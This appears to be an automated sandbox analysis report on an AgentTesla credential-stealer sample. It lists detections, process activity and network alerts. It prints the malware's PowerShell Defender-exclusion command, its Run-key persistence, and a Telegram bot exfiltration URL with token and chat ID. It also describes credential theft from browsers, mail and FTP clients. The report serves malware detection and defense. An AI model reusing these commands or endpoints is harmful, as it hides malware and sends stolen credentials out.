Edit tour

Windows Analysis Report
IUqsn1SBGy.exe

Overview

General Information

Sample name:	IUqsn1SBGy.exe renamed because original name is a hash value
Original sample name:	2e31bfbc51607f142e0413db74ced776bb207448c052b9363250d2b93e718431.exe
Analysis ID:	1587684
MD5:	dd800a9d42c8d41146c3f8f53ccd29f9
SHA1:	2c2b828705e4ddc314d3a9aee659baad7ca650bd
SHA256:	2e31bfbc51607f142e0413db74ced776bb207448c052b9363250d2b93e718431
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

IUqsn1SBGy.exe (PID: 4688 cmdline: "C:\Users\user\Desktop\IUqsn1SBGy.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

powershell.exe (PID: 6580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6448 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

IUqsn1SBGy.exe (PID: 5464 cmdline: "C:\Users\user\Desktop\IUqsn1SBGy.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

AppPoint.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

AppPoint.exe (PID: 7504 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

AppPoint.exe (PID: 7512 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

AppPoint.exe (PID: 7668 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

AppPoint.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: DD800A9D42C8D41146C3F8F53CCD29F9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.4521384104.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4520276581.00000000029C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4520429982.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2351049969.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000A.00000002.4520276581.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.4520429982.0000000002C03000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2275950717.0000000003836000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.4521384104.0000000002A90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: IUqsn1SBGy.exe PID: 4688	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: IUqsn1SBGy.exe PID: 5464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: IUqsn1SBGy.exe PID: 5464	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: IUqsn1SBGy.exe PID: 5464	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AppPoint.exe PID: 7392	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AppPoint.exe PID: 7512	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppPoint.exe PID: 7512	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: AppPoint.exe PID: 7512	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AppPoint.exe PID: 7668	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AppPoint.exe PID: 7724	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppPoint.exe PID: 7724	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: AppPoint.exe PID: 7724	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.IUqsn1SBGy.exe.4c3df80.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.IUqsn1SBGy.exe.4e04d90.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
8.2.AppPoint.exe.38f2df0.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
8.2.AppPoint.exe.3836e40.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.IUqsn1SBGy.exe.4e04d90.5.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
8.2.AppPoint.exe.38f2df0.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
8.2.AppPoint.exe.3836e40.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.IUqsn1SBGy.exe.4c3df80.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IUqsn1SBGy.exe", ParentImage: C:\Users\user\Desktop\IUqsn1SBGy.exe, ParentProcessId: 4688, ParentProcessName: IUqsn1SBGy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", ProcessId: 6580, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IUqsn1SBGy.exe, ProcessId: 5464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppPoint

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IUqsn1SBGy.exe", ParentImage: C:\Users\user\Desktop\IUqsn1SBGy.exe, ParentProcessId: 4688, ParentProcessName: IUqsn1SBGy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe", ProcessId: 6580, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:53:49.399733+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:54:02.606511+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:10.348475+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:55:51.616707+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.5	49994	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:53:49.399733+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:53:50.799445+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49713	149.154.167.220	443	TCP
2025-01-10T16:54:02.606511+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:04.026390+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49758	149.154.167.220	443	TCP
2025-01-10T16:54:10.348475+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:54:11.696863+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49807	149.154.167.220	443	TCP
2025-01-10T16:55:31.985710+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T16:55:33.718590+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49993	149.154.167.220	443	TCP
2025-01-10T16:55:51.277876+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49995	149.154.167.220	443	TCP
2025-01-10T16:55:51.616707+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T16:55:55.641973+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T16:55:56.255106+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49997	149.154.167.220	443	TCP
2025-01-10T16:55:57.669492+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T16:56:00.768696+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	49999	149.154.167.220	443	TCP
2025-01-10T16:56:06.741705+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50001	149.154.167.220	443	TCP
2025-01-10T16:56:24.766261+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50003	149.154.167.220	443	TCP
2025-01-10T16:56:44.734070+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T16:56:49.664545+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50005	149.154.167.220	443	TCP
2025-01-10T16:57:12.270281+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T16:57:21.729875+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50007	149.154.167.220	443	TCP
2025-01-10T16:57:24.011804+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T16:57:25.375197+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50009	149.154.167.220	443	TCP
2025-01-10T16:57:30.130507+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T16:57:40.312509+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50011	149.154.167.220	443	TCP
2025-01-10T16:57:52.494998+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T16:57:52.624134+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50013	149.154.167.220	443	TCP
2025-01-10T16:57:52.722309+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.5	50014	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:53:49.400183+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49710	TCP
2025-01-10T16:53:50.799703+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49713	TCP
2025-01-10T16:54:02.606796+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49751	TCP
2025-01-10T16:54:04.026658+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49758	TCP
2025-01-10T16:54:10.349098+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49798	TCP
2025-01-10T16:54:11.697132+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49807	TCP
2025-01-10T16:55:51.616988+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49994	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:53:49.085185+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:53:50.536500+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49713	149.154.167.220	443	TCP
2025-01-10T16:54:02.166795+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:03.605474+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49758	149.154.167.220	443	TCP
2025-01-10T16:54:09.897346+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:54:11.357742+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49807	149.154.167.220	443	TCP
2025-01-10T16:55:31.979474+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T16:55:33.713675+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49993	149.154.167.220	443	TCP
2025-01-10T16:55:51.221441+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T16:55:51.277076+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49995	149.154.167.220	443	TCP
2025-01-10T16:55:55.641198+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T16:55:56.254260+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49997	149.154.167.220	443	TCP
2025-01-10T16:55:57.668617+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T16:56:00.765027+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49999	149.154.167.220	443	TCP
2025-01-10T16:56:06.740775+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50001	149.154.167.220	443	TCP
2025-01-10T16:56:24.761956+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50003	149.154.167.220	443	TCP
2025-01-10T16:56:44.725630+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T16:56:49.663504+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50005	149.154.167.220	443	TCP
2025-01-10T16:57:12.269674+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T16:57:21.727426+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50007	149.154.167.220	443	TCP
2025-01-10T16:57:24.011143+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T16:57:25.373764+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50009	149.154.167.220	443	TCP
2025-01-10T16:57:30.129619+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T16:57:40.311733+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50011	149.154.167.220	443	TCP
2025-01-10T16:57:52.493800+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T16:57:52.623163+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50013	149.154.167.220	443	TCP
2025-01-10T16:57:52.721560+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50014	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}
Source: AppPoint.exe.7724.12.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: IUqsn1SBGy.exe	Virustotal: Detection: 50%			Perma Link
Source: IUqsn1SBGy.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: IUqsn1SBGy.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: /log.tmp
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: text/html
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: text/html
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>[
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ]<br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: text/html
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: application/zip
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Time:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IP Address:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <hr>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: New
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IP Address:
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: https://api.ipify.org
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: false
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: false
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 1376739206
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: appdata
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: AppPoint
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: AppPoint.exe
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: AppPoint
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: true
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Type
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <hr>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <b>[
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ]</b> (
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: )<br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {BACK}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {ALT+F4}
